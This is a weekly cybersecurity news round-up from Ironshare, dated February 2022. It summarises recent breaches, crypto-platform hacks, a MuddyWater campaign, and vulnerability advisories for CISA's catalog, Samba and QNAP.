Cyber Round-up for 4th February
Welcome to Ironshare’s Cyber Round-up, where we look back at the events of that last week and year to cover some of the news, posts, views, and highlights from the world of Security.
In this week’s round-up:
The British Council, a public sector organisation supplying English language courses has been leaking student information. The leak came from an insecure Azure blog repository that was publicly indexed. The leak could allow a hacker to obtain the full names, email addresses, student IDs, enrolment dates and duration of study to over 10,000 students at the organisation. Students are being encouraged to change passwords if they have been affected.
The cryptocurrency platform Wormhole has been hacked allowing hackers to run away with $322 million in Ethereum and Solana currency. The web application called Wormhole Portal was thought to be exploited by the hackers and used to release greater funds than initially provided. The attack has caused a global drop in the price of Eth & Sol causing the hacker’s payment to drop from $322 million to $294 million if exchanged.
Qubit, A finance platform, was recently hacked leaving the organization $80 million less in stolen funds. The hacker stole “Binance” coins through a vulnerability in the organisations QBridge protocol. The organisation usually offers up to $250,000 for its bug bounties however this has been increased to $2 million for the safe return of the stolen funds with the promise the hacker won’t be prosecuted. It is unknown if this agreement will be accepted or changed in the future.
Cisco Talos researchers have observed a new campaign by MuddyWater against Turkish organisations, the cyber gang has been observed operating in Europe, the Middle East, South Asia and the US. This latest campaign is targeting private organisations and government institutions using PDF’S, XLS Files and Windows Executables to deploy PowerShell-based downloaders and gain a footing into a device. These files are thought to be downloaded from media-sharing sites and through emails.
Vulnerabilities & Updates
The Cybersecurity & Infrastructure Agency recently added an additional eight vulnerabilities to its list of actively exploited bugs. This catalog was designed to generate awareness of the flaws, and prompt federal organisations to apply patches within the deadline. The newly added flaws include a memory corruption vulnerability in Apple IOMobileFrameBuffer, a Stack-Based Buffer Overflow Vulnerability in SonicWall SMA 100 Appliances and more.
A full list of the recent additions can be found here, along with more details and advice.
The widely used freeware implementation of Server Message Block, Samba, recently released a security update addressing multiple critical vulnerabilities. One of the vulnerabilities covered in this patch has been given a CVSS rating of 9.9 and allows a remote attacker to execute arbitrary code with root privileges. This reportedly affects all versions before 4.13.17; all Samba users are advised to apply the latest updates as soon as possible.
QNAP have published a Resolved Security Advisory related to the DeadBolt Ransomware. Shortly after publishing last week’s round-up which included the DeadBolt ransomware situation, QNAP force-installed an update on NAS devices to protect against the ransomware. This soon proved to be a mistake from QNAP, as it prevented victim’s from recovering their files if they had either paid the ransom or gained access to decryption keys. Users who are affected by this update can contact QNAP support for assistance with decrypting their files.
We have updated the Advisories and Resources section of our Log4j Vulnerability article.
We recommend keeping up to date with this information as vendors continue to fix their products and provide updates.
And that is it for this year’s round-up, please do not forget to tune in for new instalments every week.
Stay Safe, Secure and Healthy!
Edition #177 – 4th February 2022
Why not follow us on social media:
Ironshare – Security Simplified